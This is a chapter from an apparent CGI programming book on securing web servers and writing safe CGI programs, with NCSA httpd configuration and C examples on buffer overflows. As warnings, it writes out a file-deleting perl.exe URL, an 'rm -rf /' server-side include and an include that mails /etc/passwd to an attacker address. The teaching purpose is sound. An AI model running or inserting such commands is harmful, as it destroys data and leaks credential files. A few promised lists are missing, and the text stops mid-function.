Chapter 9

CGI Security




Unless you've programmed network software in the past, security has probably been the least of your programming concerns. After all, you don't need to worry about writing insecure programs on a single-user machine because, presumably, only one person has access to the machine anyway.

However, programming software designed for use over the Internet requires a different paradigm of programming with a much greater emphasis on security. There's an old computer maxim that says the only way to truly secure a computer is to disconnect it from the rest of the world and keep it in a locked room. Simply connecting the machine to a network weakens your machine's security.

This especially holds true for a large-scale "network of networks" like the Internet, where literally millions of people potentially have access to your computer. Many Internet services, especially the World Wide Web, were designed so that other people could easily access information on your computer. Each service you make available (either consciously or inadvertently) is another possible door for a wily, malicious user to exploit. A badly written network server can easily be broken into, potentially giving someone access to your entire machine and your important data.

What do I mean when I say that every network service you provide is like another door on your system? What exactly constitutes a security breach? For all intents and purposes, a security breach occurs when a person gains unauthorized access to your machine. "Unauthorized access" can mean many things, ranging from running a program on the server that was not meant to be run publicly to obtaining root access on a UNIX machine.

For security, you depend largely on the knowledge and care of the programmers who wrote your network servers. After all, no one can expect you to sift through thousands of lines of source code just to make sure there are no security holes in the software; for the most part, you rely on the programmers and on other experts who have reviewed the source code and carefully tested the software. Although past incidents such as the Internet Worm have shown that you cannot completely trust programmers to write perfectly secure code, you can take steps to minimize the risk.

Later, in "Securing Your Web Server," you learn about Web server security. For the moment, assume your Web server software is secure and properly configured; that is, no one can gain unauthorized access to your machine through your Web server alone. Why is it important to write secure CGI scripts? CGI is a generic protocol that enables you to extend the Web server. By writing a CGI program, you are adding functionality to the Web server, functionality that might inadvertently introduce new security holes. A carelessly written CGI application can give anyone full access to your machine.

When users submit a form or access a CGI script in another manner, you are essentially allowing them to run an application remotely on your machine. Because many CGI applications accept some form of user input (either through a fill-out form or from the command line), to some extent you are allowing users to control how the CGI application is run. As a CGI author, you need to make sure that your CGI script can be used only for its specified purpose. This chapter goes over related Web-security issues and provides in-depth information on writing secure CGI programs. At the end of this chapter, you also learn how to write CGI for secure transactions.

Basic Security Issues

Overall security of your Web serving machine depends on many factors. A secure CGI program is useless if your server is misconfigured or if there are other holes on your system. I discuss some of the related Web security issues here and explain how to properly configure your Web server for CGI.

Operating Systems

A common question is which platform is most secure for a Web server: a Macintosh running System 7, a UNIX workstation, a PC running OS/2, and so on. There have been many wars on this topic, each reflecting people's biases toward different operating systems.

No operating system is clearly more secure than another. UNIX is arguably more secure than a single-user platform such as a Macintosh or a PC running Windows, because once someone breaks into one of these latter machines, he or she has access to all your files. UNIX, however, has built-in notions of file ownership and permissions. If your server is configured correctly and runs as a safe (for example, non-root) user, then if someone unauthorized breaks in, he or she can do only limited damage. Limited damage, however, can be bad enough, as you will see in the examples later in this chapter.

On the other hand, because UNIX often comes preconfigured with many different types of network services such as mail, FTP, Gopher, WWW, and so on, there are more potential "doors" for someone to enter. Securing all of these services is a difficult and time-consuming process, even for the experienced administrator. Even if you configure everything correctly, you are still at the mercy of possible bugs in each individual package. Security flaws in various packages are not uncommon, as is clear from the frequency of notices of insecurities in various common UNIX network services from organizations such as the Computer Emergency Response Team (CERT).

Every platform has its own security implications, but no platform is inherently more secure than another. Although you should be aware of the implications of each operating system, they should not be your primary criterion when choosing a platform. Choose your platform, seal off the holes associated with that platform, and then configure your Web server securely and correctly. Only after you have completed these steps should you concern yourself with writing secure CGI scripts.

Securing Your Web Server

The first step in writing secure CGI scripts is to make sure your Web server is securely and properly configured. If your Web server is not secure, it does not matter how carefully you write your CGI scripts; people can still break into your machine. Additionally, configuring your Web server correctly helps minimize the potential damage of a badly written CGI program.

Choosing a Secure Web Server
There are countless Web servers available for a variety of platforms, and deciding which ones are secure is a difficult, if not impossible, task. As with any product, you will need to rely on company reputation and word of mouth.
Examine your options. After you have a list of Web servers, look at how long each product has been available and how many people currently use it. The older and more frequently used the Web server, the more likely security bugs have been found and fixed. If the code is freely available and if you have some time and expertise, look through the source code yourself and see if you can find a potential hole. Read what people on the various Web Usenet newsgroups have to say about each product and its authors or publishers. Reputable companies or authors will inform their users immediately about any problems with their product. Read the various security alerts from organizations such as CERT and CIAC (Computer Incident Advisory Capability).
Examine the feature set and determine whether you really need all of the features. The more complex and powerful the server, the more likely it is to contain an undetected security hole. Make sure your server supports logging so you can trace the cause of security break-ins or other trouble.
Have a contingency plan. Be prepared to quickly upgrade or replace your Web server if a security hole is discovered. Pay attention to news releases and the newsgroups for information regarding your Web server. Try to use the latest non-beta version of the Web server.
Don't be afraid of the free servers. There is debate over whether providing source code makes a server more or less secure. If the server source is not available, security holes are more difficult to discover. If the source is available, however, then theoretically holes can be discovered, announced, and patched quickly.

You should have three goals when securing your Web server:

The more I know about your computer, the better equipped I am to break into it. For example, if I know in which directory or folder all of your sensitive, private information is stored, I have narrowed my objective from gaining total access to your machine to simply gaining access to a directory, usually a simpler task. Or if I have access to your server configuration files or the source code of your CGI scripts, I can easily browse through them looking for potential security holes. If there are holes in your system, you don't want to make it easy for others to know about them, and you want to find them before others do.

Where Should You Put Your CGI?

As discussed earlier in Chapter 2, "The Basics," most Web servers enable you to run CGI programs in many different ways. For example, you could designate a specific directory as your cgi-bin. Alternatively, you could allow CGI to be stored in any directory.

There are advantages and disadvantages to both, but from a security standpoint, it is better to designate one directory to store all of your CGI applications. Having all of your programs in one directory makes it easier to keep track of all of the applications on your server and to audit them for potential security holes. It also helps prevent tampering. If your scripts are located in several different directories, you need to constantly check each one of these for tampering.

If you tend to use a scripting language (such as Perl) for most of your applications, then the source code is contained within the application itself. This code, then, is potentially vulnerable to being read, and exploited, if you're not careful. For example, many text editors save backup files, usually appending some extension to the end of the filename (such as .bak).

For example, emacs saves a backup file by appending a tilde to the filename (filename~). Suppose that you have a CGI script written in Perl, program.cgi, stored in one of the Web data directories rather than in a central designated directory. Now suppose that you made a trivial change to the program using emacs and forgot to remove the backup file. You now have two files in your directory: program.cgi and program.cgi~. The Web server knows that files ending in .cgi are CGI programs and will run the program rather than display its contents. However, a smart user might try to access program.cgi~ instead. Because that name does not end in .cgi, your Web server sends the file as raw text, allowing the user to search your source code for possible holes. This violates the first maxim: don't reveal more information than necessary.

However, if your server enables you to designate all files located in a certain directory as CGI programs, the file's extension doesn't matter. So in the earlier example, if the backup file were located in a properly designated directory and a user tried to access it, the server would try to run the program rather than send the source code.
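Stray backups like program.cgi~ are easy to audit for. The following is a minimal sketch that scans a single directory with the POSIX opendir() and readdir() calls and prints names that look like editor backups. Treating names ending in ~ or .bak as backups is an assumption based on the two conventions mentioned above, and the function names are hypothetical.

```c
#include <dirent.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical rule: a name ending in "~" (emacs style) or ".bak"
   looks like an editor backup. Returns 1 if so, 0 otherwise. */
int looks_like_backup(const char *name)
{
    size_t len = strlen(name);

    if (len > 0 && name[len - 1] == '~')
        return 1;
    if (len > 4 && strcmp(name + len - 4, ".bak") == 0)
        return 1;
    return 0;
}

/* Print every backup-looking entry in dir (not recursive).
   Returns the number found, or -1 if dir cannot be opened. */
int report_backups(const char *dir)
{
    DIR *d = opendir(dir);
    struct dirent *entry;
    int found = 0;

    if (d == NULL)
        return -1;
    while ((entry = readdir(d)) != NULL) {
        if (looks_like_backup(entry->d_name)) {
            printf("%s/%s\n", dir, entry->d_name);
            found++;
        }
    }
    closedir(d);
    return found;
}
```

Running report_backups() over each document directory after editing sessions would catch the program.cgi~ case; a real audit would also need to recurse into subdirectories.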

Note that designating a central directory as the location of all CGI programs on your server is limiting, especially on a multiuser system. For example, if you are an Internet Service Provider and you want to allow your users to write and run their own CGI, you might be inclined to allow CGI to be stored in any directory. Before you do this, consider the alternatives carefully. Are your clients going to be writing a lot of special customized scripts? If not, it is better to have your clients submit their scripts for auditing before they are added to the cgi-bin directory than to enable CGI in all directories.

Another issue regarding the location of CGI programs is where to put the interpreter. For interpreted scripts, the server runs the interpreter, which in turn loads the script and executes it.

Never put the interpreter in your cgi-bin directory, or in any directory in your data tree for that matter. Giving users access to the interpreter essentially gives them the power to run any application or any series of commands on your system.

This is especially important if you use a Windows or other non-UNIX operating system. In UNIX, you can specify the interpreter in the first line of your script. For example:

#!/usr/local/bin/perl
# this first line says use Perl to run the following script

In Windows, for example, there is no analogous method of specifying the interpreter within the script. One way to call a Perl script would be to create a batch file that calls Perl and the script.

rem progname.bat
rem a wrapper for my perl script, progname.pl
c:\perl\perl.exe progname.pl

However, you might be inclined to avoid creating this extra program by simply putting perl.exe in your cgi-bin directory and accessing the following URL:

http://hostname/cgi-bin/perl.exe?progname.pl

This works, but it also enables anyone in the world to run any Perl command on your machine. For example, someone could access the following URL:

http://hostname/cgi-bin/perl.exe?-e+unlink+%3C*.*%3E%3B

Decoded, the previous line is equivalent to calling Perl and running the following one-line program, which will delete all the files in the current directory. Clearly, this is undesirable.

unlink <*.*>;
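To see what the server actually hands to perl.exe, it helps to decode the query string yourself. The following sketch implements the usual form decoding (+ becomes a space, %XX becomes the byte with that hex value); the function name is hypothetical, and how a particular server splits the decoded text into command-line arguments may vary.

```c
#include <ctype.h>
#include <string.h>

/* Value of one hex digit; the caller has already checked isxdigit(). */
static int hex_value(int c)
{
    if (c >= '0' && c <= '9')
        return c - '0';
    return tolower(c) - 'a' + 10;
}

/* Decode a URL-encoded string in place: '+' becomes a space and
   "%XX" becomes the byte with hex value XX. A '%' not followed by two
   hex digits is copied unchanged. Beware: "%00" decodes to a null
   byte, which silently truncates the result as a C string. */
void url_decode(char *s)
{
    char *out = s;

    for (; *s != '\0'; s++) {
        if (*s == '+') {
            *out++ = ' ';
        } else if (*s == '%' && isxdigit((unsigned char)s[1])
                   && isxdigit((unsigned char)s[2])) {
            *out++ = (char)(hex_value((unsigned char)s[1]) * 16
                            + hex_value((unsigned char)s[2]));
            s += 2;
        } else {
            *out++ = *s;
        }
    }
    *out = '\0';
}
```

Applied to the query string -e+unlink+%3C*.*%3E%3B, this yields -e unlink <*.*>; which is exactly the dangerous command line described above.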

You will never have a reason to put an interpreter in your cgi-bin directory (or any directory capable of running CGI), so never do it. Some Windows servers can determine the type of script by its extension and run the appropriate interpreter. For example, Win-HTTPD assumes every CGI script ending in .pl is a Perl script and runs Perl automatically. If your Web server does not have this feature, use a wrapper such as the progname.bat batch file shown earlier.

Should I Use an Interpreter?
You should never even be tempted to put an interpreter in your cgi-bin if you are using a UNIX or Macintosh Web server. As noted earlier, UNIX enables you to specify the location of the interpreter within the script. To enable scripts on a Macintosh, you associate the script with the appropriate interpreter by editing the resource using a utility such as ResEdit.

Server-Side Includes

In Chapter 4, "Output," you learned a few reasons why you should avoid server-side includes. One reason often raised is security. Specifically, some implementations of server-side includes (notably NCSA and Netscape) enable users to embed the output of programs in an HTML document. Every time one of these HTML files is accessed, the program is run on the server side and the output is displayed as part of the HTML document.

By allowing this sort of server-side include, you become susceptible to a few potential security risks. First, on a UNIX machine, the programs are run by the owner of the server, not the owner of the program. If your server isn't properly configured and you have sensitive files or programs owned by the server owner, these files and programs and their output become accessible by users on your machine.

This risk increases if you allow users to edit HTML files on your system from Web browsers. A common example is a guestbook. In a guestbook, users fill out a form and submit messages to a CGI program, which often simply appends the unedited message to an HTML file, the guestbook. By not editing or filtering the submitted message, you allow the user to submit HTML code from his or her browser. If you allow programs to be executed in a server-side include, a malicious user can wreak havoc on your machine by submitting a tag like the following:

<!--#exec cmd="/bin/rm -rf /"-->

This server-side include will attempt to delete everything it can on your machine.

Note that you could have prevented this problem in several ways without having to completely turn off server-side includes. You could have filtered out all HTML tags before appending the submitted text to your guestbook. Or you could have disabled the exec capability of your server-side include (I show you how to do this for the NCSA server later in this chapter in "Example: Securely Configuring the NCSA Server").

If you forgot to do either of these things, other precautions would still have greatly minimized the damage such a tag could do. For example, as long as your server was running as a nonexistent, non-root user, this tag would most likely not have deleted anything of importance, perhaps nothing at all. Suppose that instead of attempting to delete everything on your disks, the malicious user tried to mail your /etc/passwd file to an outside address in the hope of cracking its passwords, using something like the following:

<!--#exec cmd="/bin/mail me@evil.org < /etc/passwd"-->

However, if your system uses the shadow password suite, your /etc/passwd contains no encrypted passwords and offers little useful information to a potential hacker.

This example demonstrates two important things about both server-side includes and CGI in general. First, security holes can be completely hidden. Who would have thought that a simple guestbook program on a system with server-side includes posed a large security risk? Second, the potential damage of an inadvertent security hole can be greatly minimized by carefully configuring your server and securing your machine as a whole.

Although server-side includes add another potentially useful dimension to your Web server, think carefully about the potential risks, as well. In Chapter 4, I offer several alternatives to using server-side includes. Unless you absolutely need to use server-side includes, you might as well disable them and close off a potential security hole.
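The first remedy suggested earlier, filtering submitted text before appending it to the guestbook, can be sketched in C. Instead of deleting tags, this hypothetical helper escapes the characters HTML treats specially, so a submitted <!--#exec ...--> directive is displayed as harmless text rather than parsed by the server. It is a minimal sketch of one filtering approach, not a complete guestbook program.

```c
#include <stdlib.h>
#include <string.h>

/* Return a newly allocated copy of in with &, <, >, and " replaced
   by HTML entities, or NULL if memory runs out. Caller frees it. */
char *html_escape(const char *in)
{
    size_t len = 0;
    const char *p;
    char *out, *q;

    /* First pass: compute the escaped length so the buffer is exact. */
    for (p = in; *p != '\0'; p++) {
        switch (*p) {
        case '&': len += 5; break;   /* &amp;  */
        case '<': len += 4; break;   /* &lt;   */
        case '>': len += 4; break;   /* &gt;   */
        case '"': len += 6; break;   /* &quot; */
        default:  len += 1; break;
        }
    }

    out = malloc(len + 1);           /* +1 for the terminating null */
    if (out == NULL)
        return NULL;

    /* Second pass: copy, substituting an entity where needed. */
    for (p = in, q = out; *p != '\0'; p++) {
        const char *entity = NULL;

        switch (*p) {
        case '&': entity = "&amp;";  break;
        case '<': entity = "&lt;";   break;
        case '>': entity = "&gt;";   break;
        case '"': entity = "&quot;"; break;
        }
        if (entity != NULL) {
            size_t n = strlen(entity);
            memcpy(q, entity, n);
            q += n;
        } else {
            *q++ = *p;
        }
    }
    *q = '\0';
    return out;
}
```

Escaping rather than stripping tags means the visitor's message is preserved verbatim on the page, while the server never sees a live <!-- directive.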

Securing Your UNIX Web Server

A secured UNIX system is a powerful platform for serving Web documents. However, there are many complex issues associated with securing and properly configuring a UNIX Web server. The very first thing you should do is make sure your machine is as secure as possible.

Disable network services you don't need, no matter how harmless you think they are. It is highly unlikely that anyone can break into your machine using the finger protocol, for example, which only answers queries about users. However, finger can give hackers useful information about your system.

Secure your system internally. If a hacker manages to break into one user's account, make sure the hacker cannot gain any additional privileges. Useful actions include installing a shadow password suite and removing all setuid scripts (scripts that are set to run as the owner of the script, even if called by another user).

Securing a UNIX machine is a complex topic and goes beyond the scope of this book. I highly recommend that you buy a book on the topic, read the resources available on the Internet, and even hire a consultant if necessary. Don't underestimate the importance of securing your machine.

Next, allot separate space for your Web server and document files. The intent of your document directories is to serve these files to other people, possibly to the rest of the world, so don't put anything in these directories that you wouldn't want anyone else to see. Your server directories contain important log and configuration information. You definitely do not want outside users to see this information, and you most likely don't want most of your internal users to see it or write to it either.

Set the ownership and permissions of your directories and server wisely. It's common practice to create a new user and group specifically to own Web-related directories. Make sure nonprivileged users cannot write to the server or document directories.
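Checking permissions by hand across many directories is tedious, so a small audit helper can be useful. This sketch uses the POSIX stat() call to flag two risky permission bits mentioned in this section: anything world-writable, and setuid files. The names audit_mode and warn_if_risky and the AUDIT_* constants are hypothetical. Note that stat() follows symbolic links; use lstat() to inspect a link itself.

```c
#include <stdio.h>
#include <sys/stat.h>

#define AUDIT_WORLD_WRITABLE 1   /* any user may write to it        */
#define AUDIT_SETUID         2   /* runs with its owner's user ID   */

/* Return a bitmask of AUDIT_* flags for path, 0 if neither risky bit
   is set, or -1 if stat() fails. */
int audit_mode(const char *path)
{
    struct stat st;
    int flags = 0;

    if (stat(path, &st) != 0)
        return -1;
    if (st.st_mode & S_IWOTH)
        flags |= AUDIT_WORLD_WRITABLE;
    if (st.st_mode & S_ISUID)
        flags |= AUDIT_SETUID;
    return flags;
}

/* Print a one-line warning for each risky bit found on path. */
void warn_if_risky(const char *path)
{
    int flags = audit_mode(path);

    if (flags < 0) {
        perror(path);
        return;
    }
    if (flags & AUDIT_WORLD_WRITABLE)
        printf("%s: world-writable\n", path);
    if (flags & AUDIT_SETUID)
        printf("%s: setuid\n", path);
}
```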

You'll often hear that your server should never be "running as root." Strictly speaking, this statement is misleading. In UNIX, only root can bind to ports below 1024. Because Web servers run on port 80 by default, you need to be root to start a Web server. However, after the Web server is started as root, it can either change its own process's ownership (if it's internally threaded) or change the ownership of the child processes that handle connections (if it's a forking server). Either method allows the server to process requests as a non-root user. Make sure you configure your Web server to "run as non-root," preferably as a completely nonexistent user such as "nobody." This limits the potential damage if you have a security hole in either your server or your CGI program.
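The sequence described above, starting as root only long enough to bind port 80 and then giving up root, can be sketched with the POSIX getpwnam(), setgid(), and setuid() calls plus setgroups(), which is widely available but not part of POSIX. This is a hypothetical helper, not NCSA httpd's actual code.

```c
#define _DEFAULT_SOURCE   /* exposes setgroups() in glibc's <grp.h> */
#include <grp.h>
#include <pwd.h>
#include <sys/types.h>
#include <unistd.h>

/* Permanently switch from root to the account named username
   (hypothetical helper). Returns 0 on success, -1 on failure. */
int drop_privileges(const char *username)
{
    struct passwd *pw = getpwnam(username);

    if (pw == NULL)
        return -1;                     /* no such account */

    /* Order matters: drop supplementary groups and set the group ID
       while still root, because after setuid() we no longer can. */
    if (setgroups(0, NULL) != 0)
        return -1;
    if (setgid(pw->pw_gid) != 0)
        return -1;
    if (setuid(pw->pw_uid) != 0)
        return -1;

    /* Sanity check: a non-root process must not be able to regain root. */
    if (pw->pw_uid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}
```

A server would create and bind its listening socket, call drop_privileges("nobody"), and exit if the call returns -1 rather than continue handling requests as root.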

Disable all features unless you absolutely need them. If you initially disable a feature and then later decide you want to use it, you can always turn it back on. Features you might want to disable include server-side includes and serving symbolic links.

If your users don't need to serve their personal Web documents from your server, disable public Web directories. This enables you to have complete and central control over all documents served from your machine, an important quality for general maintenance and security.

If your users do need to serve their personal documents (for example, if you are an Internet Access Provider), make sure they cannot override your main configuration. Seriously consider whether users need the ability to run CGI programs from their own personal directories. As stated earlier, it's preferable to store all CGI in one centralized location.

CGIWRAP
A popular package available on the Web is cgiwrap, written by Nathan Neulinger (nneul@umr.edu). This package enables users to run their own CGI programs as the owner of the program rather than as the owner of the server.
It's not clear whether this is better or worse than simply allowing anyone to run his or her own CGI programs unwrapped. On one hand, a bad CGI script can do less damage when it runs as nobody than when it runs as a user who actually exists. On the other hand, if a CGI program running as nobody damages the system, the responsibility lies with the system administrator, whereas if only a specific user's files are damaged, it is ultimately that user's responsibility.
My advice is to choose neither option and simply disallow unaudited user CGI programs. If this is unacceptable, then whether you use cgiwrap or a similar program ultimately depends on where you want the responsibility to lie.

Finally, you might want to consider setting up a chroot environment for your Web documents. In UNIX, you can protect a directory tree by using chroot. A server running inside of a chrooted directory cannot see anything outside of that directory tree. Under a chrooted environment, if someone manages to break in through your Web server, they can damage files only within that directory tree.

Note, however, that a chrooted environment is appropriate only for a Web server serving a single source of documents. If your Web server is serving users' documents in multiple directories, it is nearly impossible to set up an effective chrooted environment. Additionally, a chrooted environment is weakened by the existence of interpreters (such as Perl or a shell). In a chrooted environment without any shells or interpreters, someone who has broken in can at worst change or damage your files; with an interpreter, potential damage increases.
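Entering a chroot environment from C takes two calls. The sketch below is a hypothetical helper; it must run as root, and because a process that keeps root privileges can escape a chroot, it should be followed immediately by dropping privileges to an unprivileged user such as nobody.

```c
#define _DEFAULT_SOURCE   /* exposes chroot() in glibc's <unistd.h> */
#include <unistd.h>

/* Confine the calling process to the directory tree rooted at dir
   (hypothetical helper). Must be called as root. Returns 0 on
   success, -1 on failure. */
int enter_chroot(const char *dir)
{
    if (chroot(dir) != 0)
        return -1;
    /* chroot() does not change the working directory; without this,
       the process could still reach files through its old cwd. */
    if (chdir("/") != 0)
        return -1;
    return 0;
}
```

Any programs the server needs after this call (including interpreters, which the text above warns against) must exist inside dir, because nothing outside it is visible any longer.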

Example: Securely Configuring the NCSA Server

I'll demonstrate how one might go about properly configuring a common Web server in a UNIX environment by discussing the NCSA server (v1.4.2). There are many Web servers available for UNIX, but NCSA is one of the oldest, is commonly used, is freely available, and is fairly easy to configure. I will demonstrate only the configuration I think is most relevant to securing the Web server; for more detailed instructions on configuring NCSA httpd, see its Web site at http://hoohoo.ncsa.uiuc.edu/. You can apply the principles demonstrated here to almost any UNIX Web server.

First, I need to present the criteria. In this scenario, I want to set up the NCSA server on a secured UNIX machine for a small Internet service provider called MyCompany. The machine's host name is www.mycompany.net. I want everyone with an account on my machine to be able to serve his or her own Web documents and possibly use CGI or other features.

What features do I absolutely need? In this case, because I'm a small Internet service provider, I will not let users serve their own CGI. If they want to write and use their own CGI programs, they must submit them to me for auditing; if they're okay, I'll install them. Additionally, I'll provide general programs that are commonly requested, such as guestbooks and generic form-processing applications. I don't need any other features for now in this scenario, including server-side includes.

Here is how I'm going to configure my Web server. I will create the user and group www; these will own all of the appropriate directories. I will create one directory for my server files (/usr/local/etc/httpd/) and one directory for the Web documents (/usr/local/etc/httpd/htdocs/). Both directory trees will be world-readable and writable only by user and group www.

Now, I'm ready to configure the server. NCSA httpd has three configuration files: access.conf, httpd.conf, and srm.conf. First, you need to tell httpd where your server and HTML directories are located. In httpd.conf, specify the server directory with the following line:

ServerRoot /usr/local/etc/httpd

In srm.conf, specify the document directory with

DocumentRoot /usr/local/etc/httpd/htdocs

Because I want to designate all files in /usr/local/etc/httpd/cgi-bin as CGI programs, I include the following line in srm.conf:

ScriptAlias /cgi-bin/ /usr/local/etc/httpd/cgi-bin/

Note that the actual location of my cgi-bin directory is not in my document tree but in my server tree. Because I want to keep my server directory (including the directory containing the CGI) as private as possible, I keep it outside of the document directory. If I have a CGI in this directory called mail.cgi, I can access it by using the URL

http://www.mycompany.net/cgi-bin/mail.cgi

One other line in srm.conf needs to be edited. It's not particularly relevant to our specific quest of securing the server, but for completeness' sake, I'll mention it anyway:

Alias /icons/ /usr/local/etc/httpd/icons/

The Alias directive enables you to specify an alias for a directory either in or out of your document directory tree. Unlike the ScriptAlias directive, Alias does not change the meaning of the directory in any other way.

Because I want to disable server-side includes and not allow CGI in any directory other than cgi-bin, I comment out the following lines in srm.conf by inserting a pound sign (#) at the beginning of each line:

#AddType text/x-server-parsed-html .shtml
#AddType application/x-httpd-cgi .cgi

AddType enables you to associate MIME types with filename extensions. text/x-server-parsed-html is the MIME type for parsed HTML (that is, HTML containing embedded server-side include tags), whereas application/x-httpd-cgi is the type for CGI applications. I don't need to associate an extension with the CGI type in this case because I've configured the server to assume that everything in cgi-bin, regardless of filename extension, is a CGI program.

Finally, I need to set properties and access restrictions to certain directories by editing the global access.conf file. To define global parameters for all the directories, simply put the directives in the file without any surrounding tags. In order to specify parameters for specific directories, surround the directives with <Directory directoryname> tags, where directoryname is the full path of the directory.

By default, the following global options are set:

Options Indexes FollowSymLinks

Indexes tells the server to generate a listing of a directory's contents when a URL names a directory that has no index file. The name of the index file is set by DirectoryIndex in srm.conf and defaults to index.html, which is fine for my purposes. FollowSymLinks means that the server will follow symbolic links and return the data to which they point. I see no need for this feature, so I'll disable it. Now, this line looks like the following:

Options Indexes

If I wanted to allow CGI programs in any directory, I could do so by including the ExecCGI option:

Options Indexes ExecCGI

This line, along with the AddType directive in srm.conf, would allow me to run a CGI in any directory by adding the extension .cgi to all CGI programs.

By default, NCSA httpd is configured so that all of the settings in access.conf can be overridden by creating an .htaccess file in a specific directory with the appropriate properties and access restrictions. In this case, I don't mind if users change their own access restrictions. However, I don't want users to give themselves the ability to run CGI in their directories by putting lines such as the following in an .htaccess file:

AddType application/x-httpd-cgi .cgi
Options Indexes ExecCGI

Therefore, I edit access.conf to allow the user to override all settings except for Options.

AllowOverride FileInfo AuthConfig Limit

My server is now securely configured. I have disallowed CGI in all but the cgi-bin directory, and I've completely disallowed server-side includes. The server runs as user nobody (set with the User directive in httpd.conf), a nonexistent user on my system. I've disabled all features I don't need, and users cannot override these important restrictions. For more information on the many other configurations, including detailed access restrictions, refer to the NCSA server documentation.

Writing Secure CGI Programs

At this point, you have presumably secured your machine and your Web server. You are finally ready to learn how to write a secure CGI program. The basic principles for writing secure CGI are similar to the ones outlined earlier:

I've already demonstrated the potential danger of the first principle with the guestbook example. I present a few other common mistakes that can open up holes, but you need to remember to consider all of the implications of every function you write or use.

The second principle is simply an extension of a general security principle: the less the outside world knows about the inside of your system, the less equipped outsiders are to break in.

This last principle is not just a good programming rule of thumb but a good security one, as well. CGI programs should be robust. One of the first things a hacker will try to do to break into a machine through a CGI program is to try to confuse it by experimenting with the input. If your program is not robust, it will either crash or do something it was not designed to do. Both possibilities are undesirable. To combat this possibility, don't make any assumptions about the format of the information or the values the client will send.
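As one concrete case of not trusting the client, consider the CONTENT_LENGTH environment variable that accompanies a POST request. Its value is derived from what the client sends, so it might be missing, negative, non-numeric, or absurdly large. The sketch below validates it before use; the function name and the caller-supplied maximum are assumptions for illustration. It avoids strtoul() because strtoul() accepts leading whitespace and a minus sign, silently turning "-5" into a huge unsigned value.

```c
#include <ctype.h>
#include <stddef.h>

/* Parse s as a CONTENT_LENGTH value without trusting it (hypothetical
   helper). Accepts only a non-empty run of decimal digits whose value
   is at most max; stores it in *out and returns 0. Returns -1 for
   anything else: NULL, "", "-5", "12abc", or a number above max. */
int parse_content_length(const char *s, size_t max, size_t *out)
{
    size_t value = 0;

    if (s == NULL || *s == '\0')
        return -1;
    for (; *s != '\0'; s++) {
        size_t d;

        if (!isdigit((unsigned char)*s))
            return -1;
        d = (size_t)(*s - '0');
        /* Check value * 10 + d <= max before computing it, so the
           arithmetic can never overflow. */
        if (d > max || value > (max - d) / 10)
            return -1;
        value = value * 10 + d;
    }
    *out = value;
    return 0;
}
```

A caller might write parse_content_length(getenv("CONTENT_LENGTH"), 65536, &len) and reject the request when it returns -1; the 64 KB cap is an arbitrary example, not a recommended value.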

The most bare-bones CGI program is a simple input/output program. It takes what the client tells it and returns some response. Such a program offers very little risk (although holes are still possible, as you will see later). Because the CGI program is not doing anything interesting with the input, nothing is likely to go wrong. However, once your program starts manipulating the input, calling other programs, writing files, or doing anything more powerful than simply returning some output, you risk introducing a security hole. As usual, power is directly proportional to security risk.
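Before a CGI program hands input to another program (for example, an e-mail address passed to a mail command, as in the /bin/mail example earlier), one common defense is to accept only the characters you expect rather than trying to list every dangerous one. A minimal sketch follows; the function name and the allowed character set are assumptions chosen for illustration, and this is not a complete e-mail address validator.

```c
#include <ctype.h>
#include <string.h>

/* Punctuation this sketch chooses to accept (an assumption; real
   e-mail addresses may legally contain other characters). */
static const char ALLOWED_PUNCT[] = "@._+-";

/* Return 1 if s is non-empty, does not start with '-', and contains
   only letters, digits, and ALLOWED_PUNCT; otherwise return 0.
   Shell metacharacters such as ; | ` $ < > and spaces all fail. */
int is_safe_address(const char *s)
{
    if (s == NULL || *s == '\0')
        return 0;
    if (*s == '-')              /* would look like a command-line option */
        return 0;
    for (; *s != '\0'; s++) {
        unsigned char c = (unsigned char)*s;

        if (!isalnum(c) && strchr(ALLOWED_PUNCT, c) == NULL)
            return 0;
    }
    return 1;
}
```

An allow-list fails safe: a character you forgot to consider is rejected, whereas a deny-list lets it through.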

Language Risks

Different languages have different inherent security risks. Secure CGI programs can be written in any language, but you need to be aware of each language's quirks. I discuss only C and Perl here, but some of the traits can be generalized to other languages. For more specific information on other languages, refer to the appropriate documentation.

Earlier in this chapter you learned that, in general, compiled CGI programs are preferable to interpreted scripts. Compiled programs have two advantages: first, you don't need to have an interpreter accessible to the server, and second, the source code is not available. Note that some traditionally interpreted languages such as Perl can be compiled into a binary. (For information on how to do this in Perl, consult Larry Wall and Randal Schwartz's Programming Perl, published by O'Reilly and Associates.) From a security standpoint, a compiled Perl program is just as good as a compiled C program.

Programs written in lower-level languages such as C are prone to a problem called a buffer overflow. C doesn't have a good built-in method of dealing with strings. The traditional method is to declare either an array of characters or a pointer to a character. Many programmers tend to use the former method because it is easier to program. Consider the two equivalent excerpts of code in Listings 9.1 and 9.2.


Listing 9.1. Defining a string using an array in C.
#include <stdio.h>
#include <string.h>


#define message "Hello, world!"


int main()
{
  char buffer[80];


  strcpy(buffer,message);
  printf("%s\n",buffer);
  return 0;
}


Listing 9.2. Defining a string using a pointer in C.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>


#define message "Hello, world!"


int main()
{
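  /* room for every character of message plus the terminating null */
  char *buffer = malloc(sizeof(char) * (strlen(message) + 1));


  if (buffer == NULL)
    return 1;
  strcpy(buffer,message);
  printf("%s\n",buffer);
  free(buffer);
  return 0;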
}

Listing 9.1 is much simpler than Listing 9.2, and in this specific example, both work fine. This is a contrived example; I already know the length of the string I am dealing with, and consequently, I can declare an array of the appropriate length. However, in a CGI program, you have no idea how long the input string is. If message, for example, were longer than 79 characters (the 80-element array also needs room for the terminating null character), strcpy() in Listing 9.1 would write past the end of buffer, overwriting adjacent memory and probably crashing the program.

This is called a buffer overflow, and smart hackers can exploit one to execute commands remotely. A buffer overflow was the bug that afflicted NCSA httpd v1.3. It's a good example of how and why a network (or CGI) programmer needs to program with more care. On a single-user machine, a buffer overflow simply leads to a crash. There is nothing to gain by exploiting a buffer overflow to run programs on a single-user machine because (with the exception of public terminals) whoever is sitting at it could have run any program anyway. However, on a networked system, a crashed CGI program is more than a nuisance; it's a potential door for unauthorized users to enter.
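If you do use a fixed-size array as in Listing 9.1, every copy into it must be limited to the array's size. The following C function is a minimal sketch of one way to do that; copy_bounded() is a hypothetical name, not a library function, and truncating over-long input instead of rejecting it is an assumption you might well reverse.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical helper: copy src into the dstsize-byte array dst without ever
   writing past its end. The result is always null-terminated.
   Returns 1 if all of src fit, 0 if it had to be truncated. */
int copy_bounded(char *dst, size_t dstsize, const char *src)
{
  size_t len;

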